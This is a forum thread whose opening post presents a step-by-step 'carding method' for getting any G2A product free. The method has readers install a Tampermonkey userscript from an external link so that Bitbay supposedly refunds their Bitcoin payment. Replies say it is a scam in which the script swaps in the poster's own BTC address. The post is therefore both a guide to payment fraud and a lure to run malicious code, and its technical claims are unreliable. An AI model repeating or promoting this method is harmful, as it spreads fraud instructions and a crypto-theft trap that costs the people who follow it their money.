G2A carding method (card any product on g2a)

Ping

Junior Contributor
VIP
Threads
Post Replies
Status
Last seen
G2A Method

With this technique, you will want to get anything from https://www.g2a.com/totally for free. This exploit works for literally any item that is available for sale on G2A including Gift-cards, Activation Keys, and Hardware too.

Before we start make sure to check out this cashapp carding guide here

How does it function?

We will utilize a Tamper monkey script that changes our browser’s time zone at whatever point we make another request on g2a. When we get diverted to the payment page, our time zone will change - which will bring about our request getting marked as «Expired» on Bit bay’s side, yet entirely NOT on g2a's side. Thus, if we pay for the products - our request will get processed and delivered by g2a in any case, however, the cash will get INSTANTLY refunded to our wallet by Bit bay.

A short discretion of the process

Optional: Use VPN connected anywhere in the USA.

A Script that changes your browser’s time zone after making an order on g2a. A new order on g2a and pay for the products by Bitcoin for your products. a few minutes for a refund from Bit bay.

Significant - Please read this

Remember that Bit bay will refund your «Expired» request provided that it's above 0.0015 BTC. Any lower sum isn't focused on and will require you to contact their support to have a fair amount of money returned, which will bring about your solicitation getting dismissed, as they will figure out that the request was handled by g2a. If you utilize any amount higher than 0.002 BTC, it will get consequently refunded without issues.

Basically, you need to add to your cart things that are worth 0.002 BTC, it could be one or numerous items - doesn't make any difference.

There are no restrictions on the maximum worth. I for once bought 5 x $100 Amazon Gift cards in one order, and it was in a split second refunded to my wallet without any issues.

Here are the things you want

-somewhere around 0.002 BTC to pay for the order 100$ minimum purchase.

-Google Chrome program https://chrome.google.com/webstore/detail/tamper monkey/dhdgffkkebhmkfjojejmpbldmpobfkfo?hl=en

-a content that changed your Time zone.

Link: https://textbin.

If the link is no longer working, simply google for Tamper monkey and you will find it.

Step 1. Add Tamper monkey extension to your browser.

Step 2. Click on Tamper monkey’s icon at the top-right side of your browser and click «Create a new script».

Step 3. Remove any preset code so you can have a clean page just like on the screenshot:​

Step 4. Copy the script from this link: and paste it in the Editor from Step 3.

Step 5. Go to «File» and click «Save».

Step 6. Make sure that your script is Enabled. It should look just like on this screenshot.​

Step 7. Go to https://www.g2a.com/ and add some products to your cart. I will purchase a $100 Amazon/ Any Gift-card. Insert your e-mail address and click «Continue to payment».

Step 8. As soon as the payment page starts to load, you should see this message. Simply press «OK» to continue.

Step 9. Now choose «Bit bay»

Step 10. Simply pay for the products by sending the exact Bitcoin amount to the BTC address displayed in your wideband wait for 3 confirmations. As soon as your transaction gets 3 confirmations in blockchain, you will receive an e-mail from g2a with your purchased products.

Contact Me If you need help with the method, contact me.

Make sure you have read the entire method before asking me any questions.​

Project2501

Junior Contributor
Threads
Post Replies
Status
away
Last seen
That's a well known scam.
Please if you read this, don't try this.

What the script does is, replacing the btc adress with his own. So you'll send the btc directly to his wallet

Darknet

Junior Contributor
Threads
Post Replies
Status
away
Last seen
This is a scam...Pls stay away....The script replaces G2A bitpay payment address to the script owner's own..Pls stay away..Even bitpay know of this scam...

Veronaixi

Junior Contributor
Threads
Post Replies
Status
away
Last seen
Where is administration?
It is important.
Regards.

Users who are viewing this thread